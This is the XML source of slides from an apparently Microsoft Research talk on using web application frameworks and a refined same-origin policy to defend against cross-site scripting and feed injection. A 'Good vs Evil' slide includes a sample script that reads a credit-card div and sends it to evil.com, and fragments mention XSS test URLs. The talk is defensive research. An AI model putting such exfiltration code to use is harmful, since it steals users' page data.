    <dgm:cxn modelId="{12E681E0-D706-4648-8AC1-2849505B9D7E}" type="presParOf" srcId="{570FF5E6-A90C-42C2-AFE6-22699263EA03}" destId="{F2DAA586-058C-45B5-A39E-D095C6160DA0}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy6"/>
    <dgm:cxn modelId="{C531DFC8-1279-4656-A278-1CC532462C67}" type="presParOf" srcId="{570FF5E6-A90C-42C2-AFE6-22699263EA03}" destId="{7A6BAFFA-9D47-4BA8-9393-FD2DE6358CEA}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy6"/>
    <dgm:cxn modelId="{F10D5F7B-402E-4C75-83A8-EEB661449B10}" type="presParOf" srcId="{C9EA2DAE-1C50-4C8B-BCCA-996537C49972}" destId="{B237626B-F3DC-4222-991B-74CD093E4E5F}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy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B6D5D-E540-4395-A443-F9749726F167}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>6/14/2007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55B0E-AFFA-4926-8BC7-82294BD8E8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50F49-A047-47E0-AF07-B822777AFF0A}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>6/14/2007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98283B-A993-4BEC-8D1F-A8E984E83A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2667000"/>
            <a:ext cx="9143999" cy="2468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0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lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
              <a:defRPr sz="47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F556-7382-4FD1-95B4-5AA916FC4C3F}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>6/14/2007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E3583A9E-ED20-45ED-9568-A790BB115D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 userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="invGray">
          <a:xfrm>
            <a:off x="0" y="262128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6FB9-6D3E-4A9B-8244-CC46344692E5}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>6/14/2007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2E7F-16B9-4EB4-8EA8-7AFB4F2E0263}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>6/14/2007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9686-CDFC-44B5-824D-EAE6E96FD37C}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>6/14/2007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0687-C46C-4D34-921F-D4E3D63FAC34}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>6/14/2007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177CB-C74C-4317-A144-B0E82D3CA614}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>6/14/2007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4BB2-47D1-4345-B632-3D21C6217C30}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>6/14/2007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ED616-B347-4995-911C-55A0EABB7034}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>6/14/2007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2058-D6B1-4781-936D-12CECA8561BB}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>6/14/2007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BAE1-7EB3-4FF2-A0A8-E3CEC71D55B2}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>6/14/2007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DDB4AD9-213C-40E5-9307-E9671D6D5C14}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>6/14/2007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7525148-E385-491E-BAAB-B857DBE5E6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>
              <a:latin typeface="Calibri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effectLst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Calibri" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:extLst/>
          </a:lstStyle>
          <a:p>
            <a:fld id="{5BF2CB8C-FD17-4B96-9852-0C3C0129CD02}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>6/14/2007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Calibri" pitchFamily="34" charset="0"/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  <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:extLst/>
          </a:lstStyle>
          <a:p>
            <a:fld id="{E7525148-E385-491E-BAAB-B857DBE5E6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Calibri" pitchFamily="34" charset="0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victim.com/?usernam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ha.ckers.org/xs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8077200" cy="2057400"/>
          </a:xfrm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algn="r">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>Using Web Application Construction Frameworks to Protect Against </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>Code Injection Attacks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914400" y="5410200"/>
            <a:ext cx="8077200" cy="1347216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en-US" sz="2800" b="1" dirty="0" smtClean="0"/>
              <a:t>Ben Livshits and Úlfar Erlingsson</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="r">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0" smtClean="0"/>
              <a:t>Microsoft Research</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" i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Goal: Turn Things Around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534400" cy="4800600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/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000" dirty="0" smtClean="0"/>
              <a:t>With Web 2.0 upon us, we have a chance to make things right</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Secure code should be easier to write</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>It should be the default, not an exception</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Developer has to go out of her way to get it wrong</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>How to get there?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Most applications rely on frameworks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Exploit frameworks to achieve better security</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Applications built on top of frameworks get better security properties </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" smtClean="0"/>
              <a:t>by construction </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>“for free”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1447800" y="5562600"/>
            <a:ext cx="19050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</a:rPr>
              <a:t>Per-widget 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safe defaults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End-to-End Web App Security Vision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19200" y="4191000"/>
            <a:ext cx="19050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</a:rPr>
              <a:t>Per-widget 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safe defaults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010400" y="5486400"/>
            <a:ext cx="1905000" cy="762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Client-side enforcement</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1030" name="Picture 6" descr="C:\Documents and Settings\livshits\Local Settings\Temporary Internet Files\Content.IE5\4T0UI6SQ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4114800"/>
            <a:ext cx="955279" cy="127027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Striped Right Arrow 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3733800" y="4419600"/>
            <a:ext cx="2971800" cy="762000"/>
          </a:xfrm>
          <a:prstGeom prst="strip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1219200" y="3352800"/>
            <a:ext cx="19050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</a:rPr>
              <a:t>Framework libraries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219200" y="2514600"/>
            <a:ext cx="19050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</a:rPr>
              <a:t>Application code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4" name="Cross 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="3124200"/>
            <a:ext cx="457200" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="plus">
            <a:avLst>
              <a:gd name="adj" fmla="val 3765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qual 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381000" y="4038600"/>
            <a:ext cx="685800" cy="381000"/>
          </a:xfrm>
          <a:prstGeom prst="mathEqua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219200" y="4265612"/>
            <a:ext cx="2514600" cy="2278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21" name="Rounded Rectangle 20"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1219200" y="4419600"/>
            <a:ext cx="19050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itchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Web application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7" name="Up Arrow Callout 16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000">
            <a:off x="4533900" y="1409700"/>
            <a:ext cx="838200" cy="3048000"/>
          </a:xfrm>
          <a:prstGeom prst="upArrowCallou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en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Most of the effort applied here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3.33333E-6 0.11667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-3.33333E-6 0.11134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 0.11111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3.33333E-6 0.14444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7" grpId="0" animBg="1"/>
      <p:bldP spid="8" grpId="0" animBg="1"/>
      <p:bldP spid="11" grpId="0" animBg="1"/>
      <p:bldP spid="11" grpId="1" animBg="1"/>
      <p:bldP spid="11" grpId="2" animBg="1"/>
      <p:bldP spid="11" grpId="3" animBg="1"/>
      <p:bldP spid="16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Client-Side Runtime Enforcement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General enforcement strategies</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>METs [</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Erlingsson, et.al. 2007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JavaScript rewriting [</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Yu et.al. 2007</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>]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Enforcing specific properties</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Disallow code execution: BEEP [</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Jim, et.al. 2007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Isolation techniques: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>MashupOS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>/Subspace [</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Howell, et.al. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2007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This paper: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>how to accomplish isolation by default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Refine same-origin policy to provide fine-grained isolation of user interface element within an HTML page</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="576072" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
          </a:p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Show how this approach mitigates common code injection problems, including cross-site scripting and feed injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="576072" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
          </a:p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Outline how this technique can be incorporated within a framework such as the Dojo Toolkit or Microsoft Atlas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Same-Origin Policy: Good </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>vs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> Evil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3400" y="1676400"/>
            <a:ext cx="8001000" cy="4343400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="22225" cap="sq" cmpd="sng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438400"/>
            <a:ext cx="3505200" cy="3311768"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="22225" cap="sq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600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;html&gt;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  &lt;script&gt;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    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>m = document.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>                       </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>getElementById</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>mydiv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>    location =                                                             </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>         “http://evil.com?submit.cgi=“ + </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>          </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>m.toString</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>();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  &lt;/script&gt;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&lt;/html&gt;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00600" y="2438400"/>
            <a:ext cx="3352800" cy="3311768"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="22225" cap="sq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600" dirty="0" smtClean="0"/>
              <a:t>&lt;html&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;div id=“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>mydiv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>”&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>    credit card :1234 5678 9012 3456</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;/div&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>&lt;/html&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Rounded Rectangle 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="914400" y="1905000"/>
            <a:ext cx="3505200" cy="457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latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Frame 1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>: evil.com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800600" y="1905000"/>
            <a:ext cx="3352800" cy="457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latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Frame 2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>: good.com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28800" y="3352800"/>
            <a:ext cx="1905000" cy="762000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>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>host         = evil.com </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>protocol  = http</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>port         = 8000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486400" y="3352800"/>
            <a:ext cx="1981200" cy="762000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>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>host         = good.com </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>protocol  = http</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>port         = 8000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3" name="Not Equal 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3810000" y="3429000"/>
            <a:ext cx="1600200" cy="685800"/>
          </a:xfrm>
          <a:prstGeom prst="mathNotEqual">
            <a:avLst/>
          </a:prstGeom>
          <a:ln cmpd="sng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04800" y="1828800"/>
            <a:ext cx="4343400" cy="2286000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="22225" cap="sq" cmpd="sng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67200" y="4191000"/>
            <a:ext cx="4191000" cy="2286000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="22225" cap="sq" cmpd="sng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Same-Origin Lookup: Good </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>vs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> Evil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9" name="Diagram 8"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="228600" y="1905000"/>
          <a:ext cx="4343400" cy="205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2667000" y="1524000"/>
            <a:ext cx="1524000" cy="685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latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>host          = evil.com </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>protocol   = http</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>port           = 8000</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Calibri" pitchFamily="34" charset="0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4191000" y="4267200"/>
          <a:ext cx="4343400" cy="205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6477000" y="3733800"/>
            <a:ext cx="1600200" cy="685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latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>host          = good.com </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>protocol   = http</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>port           = 8000</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1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3429000"/>
            <a:ext cx="8077200" cy="1292352"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>Extending Same-Origin Policy: Same-Origin++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Blog with Comments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659565"/>
            <a:ext cx="7772400" cy="504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Blog Code: HTML with Principals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143000" y="1828800"/>
            <a:ext cx="7162800" cy="4572000"/>
          </a:xfrm>
          <a:prstGeom prst="round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&lt;div principal=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>’body’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&gt;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	Blog entries</a:t>
            </a:r>
          </a:p>
          <a:p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  	&lt;div principal=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>’entry’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&gt;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    		today’s entry</a:t>
            </a:r>
          </a:p>
          <a:p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    		&lt;div principal=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>’comment’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&gt;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      			comment #1</a:t>
            </a:r>
          </a:p>
          <a:p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    		&lt;/div&gt;</a:t>
            </a:r>
          </a:p>
          <a:p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    		&lt;div principal=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>’comment’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&gt;</a:t>
            </a:r>
          </a:p>
          <a:p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      			</a:t>
            </a:r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comment #2</a:t>
            </a:r>
          </a:p>
          <a:p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    		&lt;/div&gt;</a:t>
            </a:r>
          </a:p>
          <a:p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  	&lt;/div&gt;</a:t>
            </a:r>
          </a:p>
          <a:p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  	&lt;div principal=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>’entry’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&gt;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    		yesterday’s entry</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  	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&lt;/div&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;/div&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/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Same-Origin Lookup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75796" y="6476999"/>
            <a:ext cx="733864" cy="243840"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{E7525148-E385-491E-BAAB-B857DBE5E68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11" name="Diagram 10"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="152400" y="1642533"/>
          <a:ext cx="80772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6960972" y="4504266"/>
            <a:ext cx="1725828" cy="3386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latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>principal=(body; entry)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990600" y="4538133"/>
            <a:ext cx="1725828" cy="3386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latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>principal=(body; entry)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133600" y="5833533"/>
            <a:ext cx="2362200" cy="3386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latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>principal=(body; entry; comment)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562600" y="5833533"/>
            <a:ext cx="2362200" cy="3386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latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>principal=(body; entry; comment)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733800" y="4504266"/>
            <a:ext cx="1725828" cy="3386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latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>principal=(body; entry)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26" name="Flowchart: Connector 25"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6553200" y="1981200"/>
            <a:ext cx="1143000" cy="762000"/>
          </a:xfrm>
          <a:prstGeom prst="flowChartConnecto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/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6629400" y="2057400"/>
            <a:ext cx="1143000" cy="762000"/>
          </a:xfrm>
          <a:prstGeom prst="flowChartConnecto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/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6705600" y="2133600"/>
            <a:ext cx="1143000" cy="762000"/>
          </a:xfrm>
          <a:prstGeom prst="flowChartConnecto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/>
